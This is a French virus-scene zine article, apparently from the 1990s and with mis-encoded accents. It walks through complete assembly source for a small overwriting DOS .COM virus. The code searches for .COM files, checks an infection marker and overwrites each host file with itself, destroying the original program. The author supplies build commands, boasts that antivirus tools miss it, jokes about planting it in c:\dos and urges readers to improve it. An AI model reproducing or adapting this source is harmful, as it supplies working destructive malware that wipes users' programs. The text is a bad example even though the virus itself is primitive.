^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^ Virus exemple Nø1 ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Voila , j'ai essayer de d‚tailler ici un virus trŠs simple et en meme temp trŠs petit , l'astuce de cette petite taille est que le virus se propage en ‚crasant directement sur le fichier , ne tenant pas compte du programme infect‚ , ici , quand on lancera le fichier , il retournera directement sous le prompt , bref on s'apercevra assez vite de l'infection , voir que l'on r‚installera completement les progs infect‚s , ce virus est d‚ja a moiti‚ comdamn‚ , il serait toujours amusant de le lacher sous c:\dos qu'on voie la tˆte du technicien informatique ( que perso je n'arrive jamais a pifer , genre le type : euuuh , ce r‚seau est optimis‚ (:ouarf le vocabulaire) pour Ou-indoze95 , nos plateformes sont … la pointe de la technologie , hum hum et ne touchez pas a ce clavie ; ou bien le type qui arrive quand tu veux t'amuser sur une b‚canne de d‚monstration ou ya un pseudo internet qui en fait n'est qu'une page html sur le disque ventant les m‚rites de la compagnie aprŠs ce bref interlude , voici les explications ************************************************************************** cette partie n'est que du blabla pour que turbo assembleur ne viennent pas raler avec ses gros sabots Ä code segment assume cs:code,ds:code,es:code,ss:code org 100h main proc near Ä La routine start a pour but de mettre en 9Eh le nom du premier fichier'*.com'se trouvant dans ce repertoire grace a la subfonction 4Eh de l'int‚ruption 21h (celle du dos ) , le fichier n'infectera pas les fichiers cach‚s ni ceux en lecture seule , pour cela , il faut placer dans CX un code binaire 00000011B ou 2h Ä START: MOV AL,0 MOV AH,4Eh MOV DX,OFFSET COMFILE INT 21H JMP INFECTE ; saut sur le proc‚ssus d'infection Ä les routines close puis plus ont la fonction de fermer (3Eh) le fichier ouvert et de rechercher le prochain fichier com sur le repertoire actuel (4Fh) , 4Fh n'a besoin d'aucune pr‚paration car elles sont fix‚e avec 4Eh Ä CLOSE: MOV AH,3EH INT 21H PLUS: MOV AH,4FH INT 21H OR AL,AL JNZ BYE Ä ici le proc‚ssus d'infection ‚tant trŠs primaire , il se d‚compose comme ‚tant l'anti-r‚infecteur et infecteur , je m'explique , il ne faut pas que le virus s'‚crase tout le temp sur le meme fichier car l'infection serait impossible puis si le test parait n‚gatif il infecte le fichier Ä INFECTE: MOV AX,3D02H MOV DX,OFFSET 9EH INT 21H MOV BX,AX Ä /³\ vous avez ici l'ouverture du fichier , a partir ce moment les actions d'‚criture lecture sont possible sur le fichier , comme dans le basic ce fichier est affect‚ un num‚ro plac‚ en AX mais ca ne suffit pas car pour les prochaines int‚ruptions , le num‚ro du fichier doit se trouver en BX Ä MOV AH,3FH MOV CX,2 MOV DX,OFFSET MTEST INT 21H CMP WORD PTR MTEST,00B0H Ä routine de test d'infection comme comparaison , nous allons lire les 2 premiers octets (3Fh) et puis les comparer avec ceux du virus (ici B000h (ne pas oublier d'inverser les octets)) , pour ma part j'y ai mis une valeur fictive que j'ai remplac‚ une fois compil‚ , et j'ai ensuite recompiler avec B000h , a noter que MTEST contient les deux premiers octets du fichier Oui mais si un fichier a d‚ja 00B0H comme premiers octets? Les chances restantes sont de 1/65535 , c'est a dire que l'on ne s'en inquiete pas , si le test parait positif , il vas a close Ä JZ CLOSE MOV AX,4200H MOV CX,00 MOV DX,00 INT 21H Ä repositionnement du pointeur au d‚but du fichier ( 42H ) Ä MOV AH,40H MOV CX,84 ; taille du prog MOV DX,OFFSET START INT 21H Ä ici ‚criture de tous les octets depui start sur le fichier Ä BYE: RET Ä informations utiles au programme Ä COMFILE: DB 'coui*.com',0 MTEST: DW ? main endp code ends end main **************************************************************************** j'‚spŠre que vous aurez compris les m‚canismes de ce virus trŠs petit a cause de sa simplicit‚ , pour le compiler faites tasm mj13.asm puis tlink mj13.obj , amusez vous a refaire ou am‚liorez ce virus Je garanti qu'a la sortie de cet article de MJ13 , ce virus n'est pas reconnu par les anti-virus NB : la version MJ13 n'infecte que les coui*.com tandis que la 0B infecte tous les fichiers com Prochain ‚pisode : ca se transforme en infecteur COM *** Envoyez vos questions ou mes bugs a Zorohack@hotmail.com Sp‚cial thanks a chico , si vous avez rien a faire allez voir les articles de phalcon/skism et d'autres sur jesaisquellepage (:Alta vista ca existe non? By -Û UnKM Û- Thanks to Samson ^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^øý;,.,;ýø^